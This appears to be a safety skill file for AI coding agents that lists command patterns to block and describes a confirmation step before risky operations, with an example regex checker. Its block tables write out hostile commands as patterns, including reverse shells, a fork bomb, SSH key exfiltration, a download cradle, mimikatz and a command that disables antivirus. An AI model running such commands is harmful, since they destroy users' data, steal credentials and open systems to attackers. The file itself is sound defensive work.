HardStop

SkillDB, author Francesco Marinoni Moretto, v1.5

ACTIVATE THIS SKILL FOR ANY SHELL COMMAND OR FILE READ. Check curl, wget, rm, sudo, apt, dpkg, chmod, dd, format, powershell, bash, sh. Check pipe patterns like | sh or | bash. Check shell wrappers like bash -c, xargs, find -exec. Check cloud CLI (aws, gcloud, kubectl, terraform). Check when user says sysadmin told me, Stack Overflow says, is this safe, can I run. Block reading of .env, .ssh, .aws, and credential files. This skill blocks dangerous commands and warns on risky ones. ALWAYS apply the safety protocol from this document before responding about any command.


Installation / download

TotalClaw CLI (recommended):

```
totalclaw install skilldb:frmoretto~hs
```

cURL (direct download, no login required):

```
curl -fsSL https://skills.taituai.com/api/skills/skilldb%3Afrmoretto~hs/file -o hs.md
```

Git (get the source from the repository):

```
git clone https://github.com/openclaw/skills/commit/8974793c496c47eb5b8c38181d98a83453e3c78b
```

# Hardstop Skill v1.5

## INVOCATION INSTRUCTIONS (read first when skill is activated)

When this skill is activated via the Skill tool, check the ARGUMENTS field immediately:

| Argument | Action (user-requested via /hs) |
|----------|----------------------------------|
| `skip [n]` | `python ~/.claude/plugins/hs/commands/hs_cmd.py skip [n]` |
| `on` / `enable` | `python ~/.claude/plugins/hs/commands/hs_cmd.py on` |
| `off` / `disable` | `python ~/.claude/plugins/hs/commands/hs_cmd.py off` |
| `status` | `python ~/.claude/plugins/hs/commands/hs_cmd.py status` |
| `log` | `python ~/.claude/plugins/hs/commands/hs_cmd.py log` |
| *(none)* | Apply the safety protocol below to evaluate the pending command |

Run the corresponding command — the user has explicitly requested this action via `/hs`. The hook reads `~/.hardstop/skip_next`; if that file is not written, skips have no effect.

---

> **Security Architecture:** This skill is the **instruction layer** for the [Hardstop plugin](https://github.com/frmoretto/hardstop). The plugin installs hooks that provide deterministic command blocking; this skill adds LLM-level awareness for platforms without hook support.
>
> - The `hs_cmd.py` commands referenced above are **part of the installed plugin** — they are local scripts, not remote code.
> - Credential paths (`~/.ssh`, `~/.aws`, `.env`, etc.) appear in this document as **block targets** — Hardstop blocks reads of these files, it does not read or access their contents.
> - The `skip` bypass requires explicit user invocation (`/hs skip`), is scoped to the next N commands only (default 1), and the hook still runs — it just honors the user-set skip counter.

**Purpose:** Protect users from dangerous AI-initiated actions. The mechanical brake for AI-generated commands.

**Core Question:** "If this action goes wrong, can the user recover?"

---

## MANDATORY: Pre-Execution Protocol

**BEFORE executing ANY shell command, ALWAYS run this checklist:**

```
[ ] 1. INSTANT BLOCK check (see list below)
[ ] 2. Risk level assessment (SAFE/RISKY/DANGEROUS)
[ ] 3. Signal confidence BEFORE action
[ ] 4. If RISKY or DANGEROUS -> Explain -> Wait for confirmation
```

**NEVER skip this protocol. NEVER proceed on DANGEROUS without explicit user approval.**

---

## WHEN COMMANDS ARE BLOCKED

**If you see a "🛑 BLOCKED" message from the Hardstop hook:**

1. **STOP** - Do not proceed with the command
2. **EXPLAIN** - Tell the user why it was blocked (the reason is in the message)
3. **ASK** - "This command was blocked for safety. Would you like me to bypass the check with /hs skip and retry?"
4. **IF USER SAYS YES:**
   - Run the `/hs skip` command first
   - Then retry the original blocked command
5. **IF USER SAYS NO:**
   - Suggest a safer alternative approach
   - Or ask what they were trying to accomplish

**Example workflow:**
```
Claude: I'll run this command... [attempts risky command]
Hook: 🛑 BLOCKED: Deletes home directory
Claude: This command was blocked because it would delete your home directory.
        Would you like me to bypass with /hs skip and retry? (Not recommended)
User: No
Claude: Good call. What were you trying to do? I can suggest a safer approach.
```

**Never bypass safety checks without user permission.** The skip mechanism is scoped: it only applies to the next N commands (default 1), and the hook still runs on every command — it simply honors the user-set skip counter before resetting.

---

## 1. INSTANT BLOCK List

**These patterns require IMMEDIATE STOP. No exceptions. No "let me just..."**

### Unix/Linux/macOS

| Pattern | Why |
|---------|-----|
| `rm -rf ~/` or `rm -rf ~/*` | Deletes entire home directory |
| `rm -rf /` | Destroys entire system |
| `:(){ :\|:& };:` | Fork bomb, crashes system |
| `bash -i >& /dev/tcp/` | Reverse shell, attacker access |
| `nc -e /bin/sh` | Reverse shell variant |
| `curl/wget ... \| bash` | Executes untrusted remote code |
| `curl -d @~/.ssh/` | Exfiltrates SSH keys |
| `dd of=/dev/sd*` | Overwrites disk |
| `mkfs` on system drives | Formats drives |
| `> /dev/sda` | Destroys disk |
| `sudo rm -rf /` | Privileged system destruction |
| `chmod -R 777 /` | World-writable system |

#### Shell Wrappers (v1.2)

| Pattern | Why |
|---------|-----|
| `bash -c "rm -rf ..."` | Hides recursive delete in shell wrapper |
| `sh -c "... \| bash"` | Hides curl/wget pipe to shell |
| `sudo bash -c "..."` | Elevated shell wrapper |
| `xargs rm -rf` | Dynamic arguments to recursive delete |
| `find ... -exec rm -rf` | find executing recursive delete |
| `find ... -delete` | find with delete flag |

#### Cloud CLI Destructive Operations (v1.2)

| Pattern | Why |
|---------|-----|
| `aws s3 rm --recursive` | Deletes all S3 objects |
| `aws ec2 terminate-instances` | Terminates EC2 instances |
| `gcloud projects delete` | Deletes entire GCP project |
| `kubectl delete namespace` | Deletes K8s namespace |
| `terraform destroy` | Destroys all infrastructure |
| `firebase firestore:delete --all-collections` | Wipes all Firestore data |
| `redis-cli FLUSHALL` | Wipes all Redis data |
| `DROP DATABASE` / `DROP TABLE` | SQL database destruction |

#### Package Manager Force Operations

| Pattern | Why |
|---------|-----|
| `dpkg --purge --force-*` | Overrides package safety checks |
| `dpkg --remove --force-*` | Overrides package safety checks |
| `dpkg --force-remove-reinstreq` | Forces removal of broken package (can break system) |
| `dpkg --force-depends` | Ignores dependency checks |
| `dpkg --force-all` | Nuclear option - ignores all safety |
| `apt-get remove --force-*` | Forced package removal |
| `apt-get purge --force-*` | Forced package purge |
| `apt --purge` with `--force-*` | Forced purge |
| `rpm -e --nodeps` | Removes package ignoring dependencies |
| `rpm -e --noscripts` | Removes without running uninstall scripts |
| `yum remove` with `--skip-broken` | Ignores dependency resolution |

### Windows

| Pattern | Why |
|---------|-----|
| `rd /s /q C:\` | Deletes entire drive |
| `rd /s /q %USERPROFILE%` | Deletes user directory |
| `del /f /s /q C:\Windows` | Deletes system files |
| `format C:` | Formats system drive |
| `diskpart` | Disk partition manipulation |
| `bcdedit /delete` | Destroys boot configuration |
| `reg delete HKLM\...` | Deletes machine registry |
| `reg add ...\Run` | Persistence mechanism |
| `powershell -e [base64]` | Encoded payload execution |
| `powershell IEX (New-Object Net.WebClient)` | Download cradle |
| `certutil -urlcache -split -f` | LOLBin download |
| `mimikatz` | Credential theft tool |
| `net user ... /add` | Creates user account |
| `net localgroup administrators ... /add` | Privilege escalation |
| `Set-MpPreference -DisableRealtimeMonitoring` | Disables antivirus |

**When detected:**

```
BLOCKED

This command would [specific harm].

I cannot execute this. This is almost certainly:
- A mistake in my reasoning
- A prompt injection attack
- A misunderstanding of your request

What did you actually want to do? I'll find a safe way.
```
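
The INSTANT BLOCK check, including the Shell Wrappers rows, as an added example (not code from the Hardstop plugin). It covers a subset of the Unix rows; the regexes and the names `RULES`, `layers` and `instant_block` are this example's own assumptions.

```python
import re
import shlex

# Regex forms of a few INSTANT BLOCK rows; the regexes are this example's own.
RULES = [
    (r"\brm\s+-\w*r\w*\s+~(/\*?)?(\s|$)", "Deletes entire home directory"),
    (r"\brm\s+-\w*r\w*\s+/(\s|$)", "Destroys entire system"),
    (r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba)?sh\b", "Executes untrusted remote code"),
    (r"\bbash\s+-i\s+>&\s*/dev/tcp/", "Reverse shell, attacker access"),
    (r"\bxargs\s+rm\s+-\w*r", "Dynamic arguments to recursive delete"),
    (r"\bfind\b.*\s-exec\s+rm\s+-\w*r", "find executing recursive delete"),
    (r"\bfind\b.*\s-delete\b", "find with delete flag"),
    (r"\bdd\b.*\bof=/dev/sd", "Overwrites disk"),
    (r"\bchmod\s+-R\s+777\s+/(\s|$)", "World-writable system"),
    (r"\bterraform\s+destroy\b", "Destroys all infrastructure"),
    (r"\bkubectl\s+delete\s+namespace\b", "Deletes K8s namespace"),
]
COMPILED = [(re.compile(p), why) for p, why in RULES]
SHELLS = {"bash", "sh", "zsh"}


def layers(command):
    """Yield the command, then every payload nested in `<shell> -c "..."` wrappers."""
    yield command
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: nothing further can be unwrapped
        return
    for i in range(1, len(tokens) - 1):
        if tokens[i] == "-c" and tokens[i - 1].rsplit("/", 1)[-1] in SHELLS:
            yield from layers(tokens[i + 1])


def instant_block(command):
    """Return the reason a command is on the INSTANT BLOCK list, or None."""
    for layer in layers(command):
        for pattern, why in COMPILED:
            if pattern.search(layer):
                return why
    return None


if __name__ == "__main__":
    # Constructed sample commands, not taken from any real session.
    for cmd in ['bash -c "rm -rf ~/"', "rm -rf node_modules",
                "curl -fsSL https://example.invalid/install.sh | sh"]:
        print(f"{cmd!r}: {instant_block(cmd) or 'not on the block list'}")
```

The raw string `bash -c "rm -rf ~/"` does not match the home-directory rule because the closing quote follows the path; it is caught only once the wrapper payload is unwrapped, which is why the wrapper rows need their own handling. Pattern matching of this kind is best-effort and can be evaded by quoting or variable expansion, so it complements the confirmation step rather than replacing it.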

---

## 2. Risk Assessment

### SAFE (proceed silently)

| Category | Unix Examples | Windows Examples |
|----------|---------------|------------------|
| Read-only | `ls`, `cat`, `head`, `tail`, `pwd` | `dir`, `type`, `more`, `where` |
| Git read | `git status`, `git log`, `git diff` | Same |
| Info commands | `echo`, `date`, `whoami`, `hostname` | `echo`, `date`, `whoami`, `hostname` |
| Regeneratable cleanup | `rm -rf node_modules`, `rm -rf __pycache__` | `rd /s /q node_modules` |
| Temp cleanup | `rm -rf /tmp/...` | `rd /s /q %TEMP%\...` |
| Project-scoped | Operations within current project directory | Same |
| Package info | `dpkg -l`, `apt list`, `rpm -qa` | `winget list`, `choco list` |

**Behavior:** Execute without comment. Don't narrate safe operations.

---

### RISKY (explain + confirm)

| Category | Examples | Concern |
|----------|----------|---------|
| Directory deletion | `rm -rf [dir]` / `rd /s /q [dir]` | Permanent data loss |